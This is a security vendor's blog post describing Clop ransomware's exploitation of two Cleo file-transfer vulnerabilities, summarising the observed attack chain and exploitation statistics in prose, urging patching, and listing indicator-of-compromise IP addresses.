The Clop ransomware group has once again demonstrated its ability to exploit vulnerabilities to compromise sensitive systems. As Cleo—a managed file transfer provider for businesses—grapples with the aftermath of Clop’s targeted attack on their systems, the spotlight turns to CVE-2024-50623 and CVE-2024-55956, two critical vulnerabilities that enabled these breaches.
In this blog, we’ll provide an overview of these vulnerabilities, highlight what Imperva has observed regarding their exploitation, and explain how our solutions help mitigate these risks.
The Exploited CVEs: A Closer Look
CVE-2024-50623 and CVE-2024-55956 are both critical vulnerabilities within Cleo software, widely used for secure file transfer and data integration. CVE-2024-50623 allows unrestricted file upload and download, which could ultimately lead to remote code execution. Meanwhile, CVE-2024-55956 allows unauthenticated users to import and execute arbitrary Bash or PowerShell commands on the system. These vulnerabilities, if left unaddressed, provide attackers with the means to exfiltrate data and execute malicious payloads, as evidenced by Clop’s exploitation.
Imperva customers are protected against both vulnerabilities.
What Imperva Has Seen
Since the disclosure of these vulnerabilities, we have monitored over 1 million incidents of attempted exploitation, targeting almost 10,000 sites across 60 countries, noticeably focusing on the United States and Australia. Industries such as Financial Services and Government have been primary targets, with Clop and other attackers leveraging these CVEs in attempts to gain unauthorized access and disrupt operations. Automated attacks are primarily coming from Go-based tools.
Figure 1: Attacked Industries
After analysis of the payloads, we noticed the attackers attempted to write a file onto the target system. This first-stage dropper file is a crucial component in initiating the attack chain and is designed to invoke a PowerShell script and ultimately conduct code execution.
Figure 2: Observed Payloads
The PowerShell script then reaches out to an external IP address and retrieves JAR files. These JAR files aim for persistence on the server, and are deleted by attackers in an attempt to remain undetected.
Figure 3: Decoded PowerShell Script
Persistence is a key aspect of ransomware attacks, ensuring that the attackers maintain control even if the initial attack vector is discovered or removed. In some cases, Clop has been observed leveraging legitimate system tools or modifying system configurations, such as registry keys, to ensure that its payload runs again after a restart or other system event.
As part of its encryption process, Clop ransomware also targets backup systems to ensure that victims are unable to recover their data without paying the ransom. The attackers typically demand payment in cryptocurrency, promising to provide a decryption key upon payment. However, victims often find that paying the ransom doesn’t always guarantee that their data will be restored.
In addition to encrypting files, Clop has been known to exfiltrate sensitive data before encryption, adding an extortion element to the attack. Attackers may threaten to publish or sell the stolen data unless the victim complies with their demands, increasing the pressure on organizations to pay the ransom.
Figure 4: Clop Extortion Site
Clop has previously made news for exploiting vulnerabilities in GoAnywhere MFT and MOVEit, both file transfer programs, in 2023. Clop exploited vulnerabilities CVE-2023-34362 and CVE-2023-0669, which allowed them to access sensitive data from a wide range of companies. The breaches affected over 130 organizations across various industries, from healthcare to finance, further securing Clop’s capability to infiltrate high-value targets. As a result, it’s estimated that the group potentially earned over $75 million in ransoms, leveraging both data theft and the threat of public exposure to pressure victims into paying.
Conclusion: Staying Ahead of the Threat
The Cleo data theft attacks underscore the urgency of proactive vulnerability management. On top of robust security solutions, it’s important for organizations to prioritize timely patching to mitigate risks from known vulnerabilities like CVE-2024-50623 and CVE-2024-55956.
Imperva remains committed to helping customers secure their critical systems through advanced threat detection and prevention solutions, ensuring resilience against the ever-evolving threat landscape.
Indicators of Compromise (IoCs)
103.140.62.43
146.190.133.67
162.240.110.250
213.136.77.58
The post Imperva Protects Against the Exploited CVEs in the Cleo Data Theft Attacks appeared first on Blog.
